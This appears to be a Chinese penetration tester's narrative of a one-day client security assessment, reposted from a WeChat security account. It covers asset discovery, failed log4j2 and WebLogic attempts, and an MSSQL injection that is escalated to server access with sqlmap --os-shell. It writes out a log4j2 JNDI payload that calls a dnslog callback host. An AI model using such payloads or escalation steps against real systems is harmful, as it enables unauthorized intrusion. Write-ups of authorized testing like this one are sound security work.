记一次安服仔的逆袭 | 实战

本文作者：七七七（首次投稿，奖励信安之路知识星球体验卡，免费注册成长平台和内部Wiki）

按照惯例，每次护网开打的前几天，业务都会带着我们上门给甲方爸爸做安全服务。这次不知道是不是业务喝酒喝多了，居然跟甲方爸爸打包票能够找出大问题，而且就给我一天的时间，这不是为难我胖虎吗.jpg。

既然无力反抗，就只好躺平了。

首先看来看客户给的资产,嗯下面有清清楚楚的 8 个 url: 

虽然不全，但至少给了几个 ip，能够加快我们信息收集的速度。先打一套信息收集组合拳, oneforall、fofa、quike等等，整理完资产最后成果如下。

但我看到 xxOA 的时候我的心情是愉悦的，想着最近的 log4j2 心想能够交差了，这不有手...,呸有工具就行。

先看 OA，拿出大佬的 seeyou-GUi 工具一顿操作,然而并没有什么用。可能是开发打过补丁了。

开始测试 log4j2, 被动扫描开启，检测 log4j2，没有出现我预期的情况，难道也被修复了吗？

不信邪的我开始手工测试，登录框插入 poc ${jndi:ldap://xxx.dnslog.cn/f3qetn} ,静待回显。

可惜 dnslog 毫无反应，换 ceye、burpcollaborator.net、xray 反连平台利用绕过语句继续测试。仍然没有没有回显，那就换下一个站，weblogic 是 10.3.6 的，工具没有利用成功。

tomcat 也没有弱口令，好吧不能偷懒了。

只能一个个站的去测试，目录爆破、暴力破解、burp+xray 联动、工具扫描。直到下午 3 点多，才测出两个小漏洞,开始思考以往看过的文章，对我来讲无非三个思路:

1、续收集资产 

2、寻找 js 接口 

3、弱口令突破。

但 1 和 3 这两种方法之前已经投入了比较多的时间，个人也不想继续了，寻找 js 接口的操作已经看过很多文章但并没有在实战中真正用到，不如趁着这次机会实践一下。

根据以往的经验，aspx 与 php 的网站的漏洞会比 jsp 网站多。那就先从 aspx 开始。

看了两个站的 js 以后，还是没有什么收获，突然一个 html 源码的 test() 函数让我觉得有点希望

已知是 json 格式，那就尝试一下，运气好，提示 id 参数未传入

xray 跑出一个 mssql 报错注入

sqlmap 检测可以 --os-shell，sqlmap 检测可以 --os-shell 这里算是拿下一台服务器权限了。可以交差了。

想知道执行 --os-shell 的原理吗？可以参加《实战训练 | 从数据库功能到操作系统权限》

原文始发于微信公众号（信安之路）：记一次安服仔的逆袭 | 实战